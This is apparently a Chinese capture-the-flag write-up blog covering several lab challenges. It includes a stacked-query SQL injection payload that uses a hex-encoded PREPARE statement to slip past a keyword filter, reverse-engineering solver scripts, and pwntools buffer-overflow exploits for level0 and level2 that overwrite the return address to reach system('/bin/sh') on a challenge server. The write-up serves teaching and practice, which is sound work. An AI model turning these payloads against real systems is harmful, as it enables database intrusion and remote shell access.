date
Aug 5, 2021 12:17 PM
0x0e supersqli



因为 select 被过滤了,所以先把 select * from `1919810931114514`(注意表名要用反引号包起来)
进行 16 进制编码,再构造 payload:;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;# 即可得到 flag(0x73…60 解码后正是 select * from `1919810931114514`)。原理:MySQL 把 0x 开头的十六进制字面量当作字符串,PREPARE … FROM @a 会把这个字符串编译成预处理语句,EXECUTE 再执行它,因此 select 关键字从未以明文出现在请求里,黑名单过滤匹配不到;前提是后端允许堆叠查询(用分号执行多条语句)。另外 SET 也可以用逗号一次给多个变量赋值(SET @a=1, @b=2),并不是只能赋一个。从防御角度看,关键字黑名单挡不住这类绕过,正确做法是使用参数化查询并禁用多语句执行。
open-source
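#include <stdio.h>
#include <stdlib.h>   /* atoi() and exit(): missing in the original, which only compiles
                         thanks to implicit declarations (an error under C99 and recent GCC) */
#include <string.h>

/*
 * Key-check program from the "open-source" challenge.
 *
 * argv[1] must parse (atoi) to 0xcafe, i.e. 51966 in decimal;
 * argv[2] must satisfy second % 17 == 8 and second % 5 != 3 (25 works);
 * argv[3] must be exactly "h4cky0u".
 * On success the key is printed in hex:
 *     first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207
 * Exit codes 1..4 tell which check failed.
 *
 * Note: atoi() reports no errors -- non-numeric input silently becomes 0.
 * Fine for a CTF binary; real code should use strtoul() and check endptr.
 */
int main(int argc, char *argv[])
{
    if (argc != 4) {
        printf("what?\n");
        exit(1);
    }
    unsigned int first = atoi(argv[1]);
    if (first != 0xcafe) {
        printf("you are wrong, sorry.\n");
        exit(2);
    }
    unsigned int second = atoi(argv[2]);
    /* both halves of the condition are negative tests: reject if second%5==3 OR second%17!=8 */
    if (second % 5 == 3 || second % 17 != 8) {
        printf("ha, you won't get it!\n");
        exit(3);
    }
    if (strcmp("h4cky0u", argv[3])) {
        printf("so close, dude!\n");
        exit(4);
    }
    printf("Brr wrrr grr\n");
    /* unsigned arithmetic: the subtraction is allowed to wrap */
    unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;
    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}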
atoi (表示ascii to integer)
./string 51966 25 h4cky0u
或者不运行程序,直接把能通过全部校验的值代入 hash 公式离线算出 key:
#include <stdio.h>
#include <string.h>

/*
 * Recompute the "open-source" key offline by plugging the values that pass
 * every check (first == 0xcafe, second % 17 == 8, argv[3] == "h4cky0u")
 * into the binary's hash formula and printing it the same way the binary does.
 */
int main(void)
{
    const unsigned int first = 0xcafe;
    const unsigned int second_mod_17 = 8;
    const char *third = "h4cky0u";

    unsigned int hash = first * 31337 + second_mod_17 * 11 + strlen(third) - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}

hello ctf


simple-unpack


这是有壳啊




logmein




适量N

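def xor_decode(ciphertext: str, key: str) -> str:
    """Return *ciphertext* XORed character-by-character with the repeating *key*.

    This undoes logmein's check: the binary XORs the user input with the key
    and compares it to a stored string, so XORing the stored string with the
    same key yields the expected input. The key length is taken from ``key``
    rather than hard-coded (the original used ``i % 7``).
    """
    key_len = len(key)
    return "".join(chr(ord(c) ^ ord(key[i % key_len])) for i, c in enumerate(ciphertext))


var28 = "harambe"               # XOR key recovered from the binary
var20 = ":\"AL_RT^L*.?+6/46"    # stored comparison string
flag = xor_decode(var20, var28)
print(flag)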

no-strings-attached


X追踪一下


要解密


# Encrypted table dumped from the no-strings-attached binary. Each entry is four
# bytes (0xNN, 0x14, 0x00, 0x00); only the first byte of every entry is used by
# the solve below -- the trailing bytes are discarded.
buf = [
    0x3a, 0x14, 0x00, 0x00,  0x36, 0x14, 0x00, 0x00,  0x37, 0x14, 0x00, 0x00,  0x3b, 0x14, 0x00, 0x00,
    0x80, 0x14, 0x00, 0x00,  0x7a, 0x14, 0x00, 0x00,  0x71, 0x14, 0x00, 0x00,  0x78, 0x14, 0x00, 0x00,
    0x63, 0x14, 0x00, 0x00,  0x66, 0x14, 0x00, 0x00,  0x73, 0x14, 0x00, 0x00,  0x67, 0x14, 0x00, 0x00,
    0x62, 0x14, 0x00, 0x00,  0x65, 0x14, 0x00, 0x00,  0x73, 0x14, 0x00, 0x00,  0x60, 0x14, 0x00, 0x00,
    0x6b, 0x14, 0x00, 0x00,  0x71, 0x14, 0x00, 0x00,  0x78, 0x14, 0x00, 0x00,  0x6a, 0x14, 0x00, 0x00,
    0x73, 0x14, 0x00, 0x00,  0x70, 0x14, 0x00, 0x00,  0x64, 0x14, 0x00, 0x00,  0x78, 0x14, 0x00, 0x00,
    0x6e, 0x14, 0x00, 0x00,  0x70, 0x14, 0x00, 0x00,  0x70, 0x14, 0x00, 0x00,  0x64, 0x14, 0x00, 0x00,
    0x70, 0x14, 0x00, 0x00,  0x64, 0x14, 0x00, 0x00,  0x6e, 0x14, 0x00, 0x00,  0x7b, 0x14, 0x00, 0x00,
    0x76, 0x14, 0x00, 0x00,  0x78, 0x14, 0x00, 0x00,  0x6a, 0x14, 0x00, 0x00,  0x73, 0x14, 0x00, 0x00,
    0x7b, 0x14, 0x00, 0x00,  0x80, 0x14, 0x00, 0x00,
]

# First byte of every 4-byte entry.
f = buf[::4]
print(f)

# The binary shifted character j by nu[j % 5]; subtract it back to get the plaintext.
nu = [1, 2, 3, 4, 5]
fl = "".join(chr(value - nu[idx % len(nu)]) for idx, value in enumerate(f))
print(fl)
getit


# getit: the stored 32-char hex string is one step away from the real one --
# characters at odd indices go up by one, even indices go down by one.
s = 'c61b68366edeb7bdce3c6820314b7498'
flag = ''.join(chr(ord(ch) + (1 if idx & 1 else -1)) for idx, ch in enumerate(s))
print(flag)
# expected: b70c59275fcfa8aebf2d5911223c6589
csaw2013reversing2


打开是必须勾选以写入模式加载





参考
EasyRE
看见奇怪的东西

是个幌子

逆向算法
翻车
level0

没啥东西

有提示 点进去

read 最多读入 0x200 字节,但 buf 只有 0x80 字节,可以覆盖保存的 rbp 和返回地址

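from pwn import *

# level0 (x86-64): buf is 0x80 bytes but read() accepts up to 0x200, so the
# 8-byte saved rbp and the return address that follow it can be overwritten.
r = remote("111.200.241.244", 58379)  # challenge server

CALLSYSTEM = 0x00400596  # start of callsystem(), the function the writeup returns into

# 0x80 bytes fill buf, 8 more clobber the saved rbp, then the return address
# is replaced with the head of callsystem.
payload = b'A' * 0x80 + b'a' * 0x8 + p64(CALLSYSTEM)
# NOTE(review): if system() faults on a movaps (16-byte stack alignment), insert a
# `ret` gadget before CALLSYSTEM -- not needed according to this writeup.

# Wait for the banner (bytes, not str, so py3 pwntools does not warn). The original
# followed this with `p.recv()`, which raised NameError (the connection is `r`) and
# would have blocked anyway because recvuntil already consumed the banner.
r.recvuntil(b"Hello, World\n")
r.sendline(payload)
r.interactive()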

level2

漏洞函数在前


缓冲区只有 0x88 字节,但 read 可以读入 0x100 字节,足以覆盖返回地址
找到要跳转的 system 函数地址(plt 项)
0x08048320

需要调用 system('/bin/sh'),所以先在二进制里找到 '/bin/sh' 字符串的地址
0x0804a024

构建 payload

# level2 (32-bit): 0x88 bytes of buffer plus 4 bytes of saved ebp, then the
# return address. Returning into system@plt means faking its frame by hand:
# a dummy return address (0) followed by the pointer to "/bin/sh".
PADDING = 0x88 + 0x4
SYSTEM_PLT = 0x08048320
BIN_SH = 0x0804a024
payload = b'a' * PADDING + p32(SYSTEM_PLT) + p32(0) + p32(BIN_SH)
from pwn import *

# level2 (32-bit): buf is 0x88 bytes, followed by the 4-byte saved ebp and
# the return address.
p = remote('111.200.241.244', 60256)

PADDING = 0x88 + 0x4
SYSTEM_PLT = 0x08048320    # system entry the writeup jumps to (presumably system@plt)
CALL_SYSTEM = 0x0804845c   # the `call system` instruction inside the binary
BIN_SH = 0x0804a024        # address of the "/bin/sh" string

# Two equivalent frames (the writeup notes both work):
#  (a) return to the `call system` site: the call pushes its own return address,
#      so "/bin/sh" must be the next dword on the stack;
#  (b) return straight into system: fake the frame by hand with a dummy return
#      address (0) before the argument.
payload_via_call = b'a' * PADDING + p32(CALL_SYSTEM) + p32(BIN_SH)
payload = b'a' * PADDING + p32(SYSTEM_PLT) + p32(0) + p32(BIN_SH)

p.recv()            # drain whatever the server prints first (an "Input:" prompt per the original)
p.sendline(payload)
p.interactive()
两种方式都可以
level3
- 作者:lea
- 链接:https://bear4.ml/article/web2
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。